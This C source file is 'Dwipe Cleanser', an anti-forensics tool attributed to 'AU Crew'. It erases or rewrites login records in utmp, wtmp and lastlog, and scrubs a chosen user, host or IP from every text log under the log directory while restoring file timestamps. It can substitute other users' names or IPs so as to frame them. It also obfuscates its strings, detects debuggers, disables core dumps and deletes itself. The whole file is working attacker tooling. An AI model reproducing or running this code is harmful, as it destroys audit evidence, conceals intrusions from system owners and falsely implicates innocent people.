/********************************************************************
 * AU Crew
 *
 * Presents:
 * 			Dwipe Cleanser
 *
 * 	"If you're going to wipe, always wipe from front to back"
 *
 * Features:
 * 	* Unfriendly mode which provides:
 * 	     * No strings (well almost none)  Removes
 * 	       Usage, etc.  Adds anti-forensics to this
 * 	       binary
 * 	     * Ex: securely unlinks itself if wrong option is used
 * 	* Preserves access/modify times but that's not that
 * 	   all that usefull...
 * 	* Set WTMP modify time to last valid login before wipe
 * 	* Wipes logs with random data before remove lines
 * 	* Can replace/frame accounts by replacing user names
 * 	  or IPs/Hosts with another specified
 * 	* Parses the entire log directory for all logs
 * 	* Works recursively on the log directory
 * 	* Works on binary logs: UTMP, WTMP, LASTLOG
 * 	* Makes every attemp to use RAM instead of temp files
 * 	* Will use Temp files if necessary but securely wipes them
 * 	* Wipes RAM and buffers before freeing back to the stack
 * 	* Wipes itself if it detects a debugger is running on it
 * 	* Disable core files if they are enabled
 *
 *   (c) 2005 macabre
 *   
 * * This software may be used and distributed according to the terms
 * * of the GNU General Public License, incorporated herein by reference.
 *******************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <utmp.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/ptrace.h>
#include <fcntl.h>
#include <string.h>
#include <utime.h>
#include <lastlog.h>
#include <pwd.h>
#include <paths.h>
#include <dirent.h>
#include <ctype.h>
#include <time.h>
#include <signal.h>

#include "enc_strings.h"

/* Defines for error level - Helpful in non-friendly mode */
#define ERR_USAGE			(1 << 0)
#define ERR_UTMP			(1 << 1)
#define ERR_NOUSER			(1 << 2)
#define ERR_WTMP			(1 << 3)
#define ERR_LASTLOG			(1 << 4)
#define ERR_NOROOT			(1 << 5)
#define ERR_VARLOG			(1 << 6)
#define ERR_DEBUGGER			(1 << 7)
#define ERR_TMPFILE			(1 << 8)

#define VERSION 0.1

#define HEADER_BUF			10
#define MAX_BUF				1024

struct logs {
	char *logfile;
	struct logs *next;
};

// GLOBALS
int errnum = 0;

#ifdef FRIENDLY
void Usage(char *me) {
	printf("Usage %s -u <user> -s <server> -i <ip>\n",me);
	printf("\n"
	       "Required\n"
	       "\t-u\t\tUser to search for and wipe\n"
	       "\t-s\t\tServer/hostname to search for and wipe\n"
	       "\t-i\t\tIP to search and wipe\n"
	       "\nOptional\n"
	       "\t-U\t\tUser name to replace in logs\n"
	       "\t-S\t\tServer/hostname to replace in logs\n"
	       "\t-I\t\tIP to replace in logs\n"
	       "\t-L\t\tDifferent logdir to scan\n"
	       "\t-O\t\tOnly parse log files NO binaries\n"
	       "\t-h\t\tThis output\n"
	       "\n");
	exit(ERR_USAGE);
}
#endif

/* Returns a pointer to a string of random data of set size */
char *random_buf(int size) {
    char *str;
    int cnt;
    str=(char*)malloc(size);
    for(cnt=0; cnt<size;cnt++)
	    str[cnt] = (unsigned char) (256.0*rand()/(RAND_MAX+1.0));
    return str;
}

/* Super simple XOR function for strings */
void xor_buf(char *str, int key) {
  int cnt;
  for(cnt=0;cnt < strlen(str);cnt++) 
	str[cnt] = str[cnt] ^ key;
}

/* Wipes the contents of a file */
/* This prevents extra data from being able to be
 * easily recovered in the slack space when the logs/file
 * gets truncated
 */
void clear_file(char *file) {
	char *buf;
	int fd,cnt;
	struct stat info;
	
	fd=open(file,O_WRONLY);
	if(fd < 0)
		return;
	fstat(fd,&info);
	buf=(char*)malloc(info.st_size);
	if(buf) { /* Enough RAM to wipe file using random data instead */
		free(buf);
		buf=random_buf(info.st_size);
		write(fd,buf,info.st_size);
	} else { /* Nope wipe byte by byte */
		for(cnt=0;cnt<info.st_size;cnt++)
			write(fd,0,1);
	}
	close(fd);
	free(buf);
}

/* Wipes then unlinks file from file system */
/* Order: wipe, truncate, rename, unlink */
/* NOTE: when doing this to argv[0] it will only rename, unlink */
void unlink_file(char *file) {
	char *newname;
	int fd;
	
	/* Wipe the File */
	clear_file(file);
	/* Truncate file */
	if((fd = open(file, O_WRONLY | O_TRUNC)) >= 0)
		close(fd);
	newname=random_buf(10);
	/* Rename file & Unlink it */
	if(rename(file,newname)) {
		unlink(file);
	} else {
		unlink(newname);
	}
	free(newname);
}

int wipe_utmp(char *user, char *new) {
   struct utmp ut;
   struct stat info;
   struct utimbuf filetime;
   int size, fd, count = 0;
   char *utmpfile;

   utmpfile=malloc(strlen(PATH_UTMP));
   strncpy(utmpfile,PATH_UTMP,strlen(PATH_UTMP));
   xor_buf(utmpfile,XOR_KEY);
   size = sizeof(ut);
   fd = open(utmpfile, O_RDWR);
   if(fd < 0) {
#ifdef FRIENDLY
	   printf("Couldn't open UTMP file\n");
#endif
	   exit(ERR_UTMP);
   }
   fstat(fd,&info);
   while (read (fd, &ut, size) == size) {
	if(!strncmp(ut.ut_user, user, strlen(user))) {
		count++;
		if(!new) {
			memset(&ut, 0, size);
		} else {
			strncpy(ut.ut_user,new,UT_NAMESIZE);
		}
		lseek(fd, -1*size, SEEK_CUR);
		write(fd, &ut, size);
	}
   }
   fsync(fd);
   close(fd);
   filetime.actime = info.st_atime;
   filetime.modtime = info.st_mtime;
   utime(utmpfile, &filetime);
   return count;
}

int get_temp(char *tfile) {
    int tempfile;

    tfile=malloc(strlen(TMP_FILE));
    strncpy(tfile,TMP_FILE,strlen(TMP_FILE));
    xor_buf(tfile,XOR_KEY);
    tempfile=mkstemp(tfile);
    if(tempfile < 0) {
#ifdef FRIENDLY
	    printf("Couldn't create temp file %s\n", tfile);
#endif
	    exit(ERR_TMPFILE);
    }
    tempfile=open(tfile,O_RDWR);
    if(tempfile < 0) {
#ifdef FRIENDLY
	    printf("Couldn't open temp file %s\n", tfile);
#endif
	    exit(ERR_TMPFILE);
    }

    return tempfile;
}

int wipe_wtmp(char *user, char *newuser, char *server, char *newserver) {
   int count = 0;
   int size, fd, tempfile = 0;
   char *tfile = NULL;
   struct utmp ut;
   struct stat info;
   struct utimbuf filetime;
   char *buf = NULL;
   int ptr = 0;
   char *wtmpfile;
   time_t lastlogin = 0, prev_login = 0;

   wtmpfile=malloc(strlen(PATH_WTMP));
   strncpy(wtmpfile,PATH_WTMP,strlen(PATH_WTMP));
   xor_buf(wtmpfile,XOR_KEY);
   size = sizeof(ut);
   fd = open(wtmpfile, O_RDONLY );
   if(fd < 0) {
#ifdef FRIENDLY
	   printf("Coudln't open WTMP file\n");
#endif
	   exit(ERR_WTMP);
    }
    fstat(fd, &info);
    buf = (char *)malloc(info.st_size);
    if(!buf)
	    tempfile=get_temp(tfile);
    while( read (fd, &ut, size) == size) {
	    if(!strncmp(ut.ut_user, user, strlen(user)) ||
	       !strncmp(ut.ut_host, server, strlen(server))) {
		    if(newuser)
			    strncpy(ut.ut_user, newuser, UT_NAMESIZE);
		    if(newserver)
			    strncpy(ut.ut_host, newserver, UT_HOSTSIZE);
		    if(newserver || newuser) {
			    if(buf) {
				memcpy(buf+ptr,&ut,size);
				ptr+=sizeof(ut);
			    } else {
				write(tempfile,&ut,size);
			    }
			    prev_login = lastlogin;
			    lastlogin = ut.ut_time;
		    }
		    count++;
	    } else {
		        if(buf) {
				memcpy(buf+ptr,&ut,size);
				ptr+=sizeof(ut);
			} else {
				write(tempfile,&ut,size);
			}
			prev_login = lastlogin;
			lastlogin = ut.ut_time;
	    }
    }
    close(fd);
    if(buf) {
	clear_file(wtmpfile);
	fd=open(wtmpfile,O_WRONLY | O_TRUNC );
	write(fd,buf,ptr);
	fsync(fd);
	close(fd);
	memset(buf,0,ptr);
	free(buf);
    } else {
	lseek(tempfile,0,SEEK_SET);
	clear_file(wtmpfile);
	fd=open(wtmpfile,O_WRONLY | O_TRUNC);
        while( read (tempfile, &ut, size) == size) 
		write(fd,&ut,size);
	close(fd);
	close(tempfile);
	unlink_file(tfile);
	free(tfile);
    }
    if(prev_login) {
	filetime.actime = prev_login;
   	filetime.modtime = prev_login;
    } else {
   	filetime.actime = info.st_atime;
   	filetime.modtime = info.st_mtime;
    }
   utime(wtmpfile, &filetime);
   return count;
}

void wipe_lastlog(char *user, char *newuser) {
   struct lastlog ll;
   struct stat info;
   struct utimbuf filetime;
   struct passwd *pass = NULL;
   int uid;
   int size, fd;
   char *llfile;

   llfile=malloc(strlen(PATH_LASTLOG));
   strncpy(llfile,PATH_LASTLOG,strlen(PATH_LASTLOG));
   xor_buf(llfile,XOR_KEY);
   size = sizeof(ll);
   fd = open(llfile, O_RDWR);

   if(fd < 0) {
#ifdef FRIENDLY
	   printf("Coudln't open lastlog file\n");
#endif
	   exit(ERR_LASTLOG);
    }
    fstat(fd, &info);
    pass = getpwnam(user);
    uid = pass->pw_uid;
    lseek(fd, size*uid, SEEK_SET);
    read(fd,&ll,size);
    if(newuser) {
	if((pass = getpwnam(newuser))) {
    		lseek(fd, size*pass->pw_uid, SEEK_SET);
		write(fd,&ll,size);
	}
    }
    memset(&ll,0,size);
    lseek(fd, size*uid, SEEK_SET);
    write(fd,&ll,size);
    fsync(fd);
    close(fd);
    filetime.actime = info.st_atime;
    filetime.modtime = info.st_mtime;
    utime(llfile, &filetime);
}

/* Takes a string and replaces this with that */
void replace(char *str, char *this, char *that) {
   char *newstr;
   char *ptr;
   int size = 0;

   if((ptr = strstr(str,this)) != NULL) {
        size=strlen(str)-strlen(this)+strlen(that);
	newstr = (char *)malloc(size);
	memset(newstr,0,size);
	memcpy(newstr, str, (ptr-str)); /* Copy first segment */
	memcpy(newstr+(ptr-str), that, strlen(that)); /* Insert new word */
	/* copy rest of string into newstr */
	strncpy(newstr+(ptr-str)+strlen(that), ptr+strlen(this), size-((ptr-str)+strlen(this))+1);
	memset(str,0,strlen(str));
	/* Copy new string over old one */
	memcpy(str,newstr,strlen(newstr));
        memset(newstr,0,size);
        free(newstr);
   }
}

void wipe_log(char *logfile, char *user, char *newuser, char *server, char *newserver, char *IP, char *newIP) {
   FILE *fp, *tfp;
   struct stat info;
   struct utimbuf filetime;
   char *buf;
   char *buf2;
   int size=0;
   int count=0;
   int found;
   int tempfile = 0;
   char *tfile = NULL;

   stat(logfile, &info);
   fp = fopen(logfile, "r");
#ifdef FRIENDLY
   printf("Scanning %s...\n",logfile);
#endif
   buf = (char *)malloc(MAX_BUF);
   buf2 = (char *)malloc(info.st_size+MAX_BUF); /* TODO: Fix this...file could grow more */
   if(!buf2)
	   tempfile=get_temp(tfile);
   while(fgets(buf,MAX_BUF,fp) != NULL) {
	   found=0;
	   if(user) 
		   if(strstr(buf,user)) {
			   found++;
			   if(newuser)
				replace(buf,user,newuser);
		   }
	   if(server) 
		   if(strstr(buf,server)) {
			   found++;
			   if(newserver)
				replace(buf,server,newserver);
		   }
	   if(IP) 
		   if(strstr(buf,IP)) {
			   found++;
			   if(newIP)
				replace(buf,IP,newIP);
		   }
	   
	    if( ((newuser || newserver || newIP) && found) || !found) {
		    if(buf2) {
			memcpy(buf2+size, buf, strlen(buf));
			size+=strlen(buf);
		    } else {
			write(tempfile,buf,strlen(buf));
		    }
	    }
	    count+=found;
   }
   fclose(fp);
   clear_file(logfile);
   fp = fopen(logfile, "w");
   if(buf2) {
	   fwrite(buf2,size,1,fp);
   	   memset(buf2,0,size);
     	   free(buf2);
   } else {
	close(tempfile);
	tfp = fopen(tfile,"r");
	while(fgets(buf,MAX_BUF, tfp) != NULL) 
		fputs(buf,tfp);
	fclose(tfp);
	unlink_file(tfile);
	free(tfile);
   }
   fflush(fp);
   fclose(fp);
   memset(buf,0,MAX_BUF);
   free(buf);
   filetime.actime = info.st_atime;
   filetime.modtime = info.st_mtime;
   utime(logfile, &filetime);
#ifdef FRIENDLY
   if(count)
	   printf(" * Removed/replaced %d lines\n", count);
#endif
}

/* Locates logs to wipe */
void locate_logs(char *path, char *user, char *newuser, char *server, char *newserver, char *IP, char *newIP) {
    DIR *var;
    struct dirent *files;
    char *buf, *logfile;
    int fd,cnt, notascii, pathsize;
    
    var = opendir(path);
    if(!var) {
#ifdef FRIENDLY
	    printf("Couldn't open logdir %s\n",path);
#endif
	    errnum |= ERR_VARLOG;
	    return;
    }
    buf = (char *)malloc(HEADER_BUF);
    while((files = readdir(var))) {
	pathsize = strlen(path);
	logfile=malloc(pathsize+strlen(files->d_name)+2);
	memset(logfile,0,pathsize+strlen(files->d_name)+2);
	strncat(logfile,path,pathsize);
	/* Check for trailing slash */
	if(logfile[pathsize-1] != '/') {
		logfile[pathsize]='/';
		logfile[pathsize+1]=0;
	}
	strncat(logfile,files->d_name,strlen(files->d_name));
	if(files->d_type == DT_DIR) {
		logfile[pathsize+strlen(files->d_name)]='/';
		if(strcmp(files->d_name,".") && strcmp(files->d_name,"..")) 
			locate_logs(logfile,user,newuser,server,newserver,IP,newIP);
		free(logfile);
		continue;
	}
	fd = open(logfile, O_RDONLY);
	if(fd < 0) {
#ifdef FRIENDLY
		printf("Couldn't open log file %s\n", logfile);
#endif
		continue;
	}
	read(fd,buf,HEADER_BUF);
	notascii = 0;
	for(cnt=0;cnt < HEADER_BUF;cnt++) {
		if(!isprint(buf[cnt]))
			notascii++;
	}
	close(fd);
	if(!notascii)  /* Double negative ;) */
		wipe_log(logfile, user, newuser, server, newserver, IP, newIP);
        memset(logfile,0,strlen(logfile));
        free(logfile);
    }
    memset(buf,0,HEADER_BUF);
    free(buf);
}

/* Anti-debugger Signal Hanlder */
void handler(int signo) {
}

/* Turns off core files if they are turned on */
void disable_core() {
	struct rlimit limit[1] = {{ 0, 0 }};

	if (getrlimit(RLIMIT_CORE, limit) == -1)
		return;
	limit->rlim_cur = 0;
	setrlimit(RLIMIT_CORE, limit);
}

int main(int argc, char **argv) {

	extern char *optarg;
	extern int optind, opterr, optopt;
	char *user = NULL, *newuser = NULL;
	char *server = NULL, *newserver = NULL;
	char *IP = NULL, *newIP = NULL;
	int c, cnt, euid, added;
	int only_logs = 0;
	char *logdir;
	char *opts;
	struct logs *loginfo = NULL, *logtemp, *newlog;

	euid = geteuid();
	if(euid > 0) {
#ifdef FRIENDLY
		printf("You need to be root to run this Jackass!\n");
#endif
		exit(ERR_NOROOT);
	}

	/* Anti-debugger code: Insert breakpoint */
	signal(SIGTRAP, handler);
__asm__(" int3 ");
	/* Disable core files */
	disable_core();

	opterr = 0;
	opts=malloc(strlen(GETOPT));
	strncpy(opts,GETOPT,strlen(GETOPT));
	xor_buf(opts,XOR_KEY);
	while ((c = getopt(argc, argv, opts)) != -1) {
	  switch(c) {
	  case 'h':
#ifdef FRIENDLY
		Usage(argv[0]);
#endif
		exit(ERR_USAGE);
		break;
	  case 'u':
		user = optarg;
		break;
	  case 'U':
		newuser = optarg;
		break;
	  case 's':
		server = optarg;
		break;
	  case 'S':
		newserver = optarg;
		break;
	  case 'i':
		IP = optarg;
		break;
	  case 'I':
		newIP = optarg;
		break;
	  case 'L':
		/* We use a linked list because I like them better than arrays of strings */
		added = 0;
		newlog = malloc(sizeof(struct logs));
		newlog->logfile = optarg;
		newlog->next = NULL;
		if(loginfo == NULL)
			loginfo = newlog;
		else {
			for(logtemp = loginfo; logtemp && !added; logtemp = logtemp->next) {
				if(logtemp->next == NULL) {
					logtemp->next = newlog;
					added = 1;
				}
			}
		}
		break;
	  case 'O':
		only_logs = 1;
		break;
	  default:
#ifdef FRIENDLY
		Usage(argv[0]);
#else
		unlink_file(argv[0]);
		exit(ERR_USAGE);
#endif
		break;
	  }
	}

	if((!user && !server && !IP) || opterr) {
#ifdef FRIENDLY
		Usage(argv[0]);
#else
		unlink_file(argv[0]);
		exit(ERR_USAGE);
#endif
	}

	srand( (getpid()+getuid()+getgid()) ^ time(0) );

	/* Anti-Debugger: Detects if being traced */
	if (ptrace(PTRACE_TRACEME, 0, 1, 0) < 0) {
		unlink_file(argv[0]);
		exit(ERR_DEBUGGER);
	}
	
	if(newuser && !user) {
#ifdef FRIENDLY
		printf("You need to specify the original user if you want to replace it!!\n");
#endif
		exit(ERR_NOUSER);
	}
	
	if(user && !only_logs) {
		cnt=wipe_utmp(user, newuser);
		wipe_lastlog(user, newuser);
#ifdef FRIENDLY
		printf("Wiped/replaced %d entries in UTMP\n",cnt);
		printf("Wiped lastlog entry\n");
	} else {
		if(!only_logs) {
			printf("WARNING: Won't wipe utmp w/o a user specified!\n");		
			printf("WARNING: Won't wipe lastlog w/o a user specified!\n");
		}
#endif
	}
	if(server && user && !only_logs) {
		cnt=wipe_wtmp(user, newuser, server, newserver);
#ifdef FRIENDLY
		printf("Wiped/replaced %d entries in WTMP\n",cnt);
	} 
	else {
		if(!only_logs)
			printf("WARNING: Won't wipe wtmp w/o a user and a server specified!\n");
#endif
	}
	if(loginfo) {
		for(logtemp = loginfo; logtemp; logtemp = logtemp->next) 
			locate_logs(logtemp->logfile,user,newuser,server,newserver,IP,newIP);
	} else {
		logdir=malloc(strlen(LOG_DIR));
		strncpy(logdir,LOG_DIR,strlen(LOG_DIR));
		xor_buf(logdir,XOR_KEY);
		locate_logs(logdir,user,newuser,server,newserver,IP,newIP);
	}
	
	exit(errnum);
}
